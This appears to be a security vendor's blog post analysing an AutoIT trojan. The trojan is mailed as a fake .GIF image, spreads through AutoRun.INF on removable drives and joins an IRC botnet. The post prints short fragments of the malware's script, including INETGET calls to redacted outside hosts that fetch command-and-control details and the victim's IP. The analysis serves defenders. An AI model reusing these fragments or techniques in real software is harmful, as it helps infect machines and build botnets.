This post is made on behalf of my colleague Manoj Venugopalan, Malware Analyst for Symantec Hosted Services.
AutoIT, a free automation language for Windows platform-based development, is often used for scripting Windows-based applications and sometimes misused for creating malware. AutoIT scripts can be compiled into a compressed, standalone executable which will run without an interpreter. Auto2Exe is the application used to compile the AutoIT script into a standalone executiable.
Most of the malware based on AutoIT is in the form of worms and Trojans. Many such worms are well-known for logging into a user's IM client, changing their status message and then sending copies of the malware to all of the "buddies" in the victim's list.
MessageLabs Intelligence recently discovered an AutoIT Trojan using IRC (online chat) to connect an infected machine to a command and control channel without the user's knowledge. The malware is sent in the form of an enticing message containing an archive of .GIF files with a subject like "My Photos" to around 50 recipients to lure them into opening the attachment.
[Figure 1 - Example Email]
One of the files, disgused as a .GIF image is actually an executable using an icon for an image, and may give the illusion that the exeutable is a broken image (as seen in figure 2, below). If the user tries to open the file, it will execute and give the appearance that something hasn’t worked correctly as no image is displayed; the the user may draw the conclusion that it is nothing more than a corrupt image.
[Figure 2 - Content of Attached Archive File]
Once the executable is triggered, it connects to a website based in Vietnam (.vn) and downloads instructions to connect to an IRC server for its command and control. These are saved as a plain text file and used to join the correct channel. In order to propagate further, the malware also attempts to copy itself to any removable drives (including media players and USB memory sticks) creating with it an AutoRun.INF file. This file will invoke the malicious application whenever the drive is connected to a computer (unless the auto-execute feature is disabled by the user).
[Figure 3 - Text File Being Downloaded, Identifying Command and Control Channel]
Once connected, further instructions may be downloaded as the infected machines are now joined to a small botnet, or robot network. A botnet may be used to conduct Distributed Denial of Service (DDoS) attacks, sending spam, hosting websites, targeting other computers by exploiting existing vulnerabilities and pushing adware or spyware on to infected machines.
Below are some fragments of the script code used:
INETGET ( "http://[removed].vn/[removed].php" , @SYSTEMDIR & "\[removed].txt" , 1 , 0 )
The function is used to download the IRC details and parsed later to extract the IRC server name, port to connect to, channel name and version of the malware application (presumably used to provide an update facility).
Once it has collected all this information, it then tries to identify the infected machine’s external IP address by contacting another website for this purpose.
INETGET ( "http://[removed].com/" , @SYSTEMDIR & "\ip.txt" , 1 , 0 )
The above command will get the IP address of the machine and will store into the file ip.txt.
It then creates nickname for the computer to connect to the channel and is a combination of randomly generated letters with a common tag:
$NICK = "[REMOVED]-" & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) &
CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) &
CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) )
After this it then connects to the IRC channel in the background to join the botnet.
The approach of using AutoIT as a toolkit for creating malware has been around for some years, however, many anti-virus vendors still struggle to detect them accurately, without incurring a high number of false positives (when legitimate software is misidentified as malware). This is one reason why AutoIt is still being used in this way. It is also very flexible and easy to program and when compiled, the executable is compressed and packed using UPX (a well-known open-source compression tool), making the code highly obfuscated and harder for anti-virus software to analyse without a signature.
Although the recent case may not have been used in a targeted attack, many examples using this technique that were blocked by Skeptic were sent to financial institutions, which could potentially expose the business to further attack or compromised data.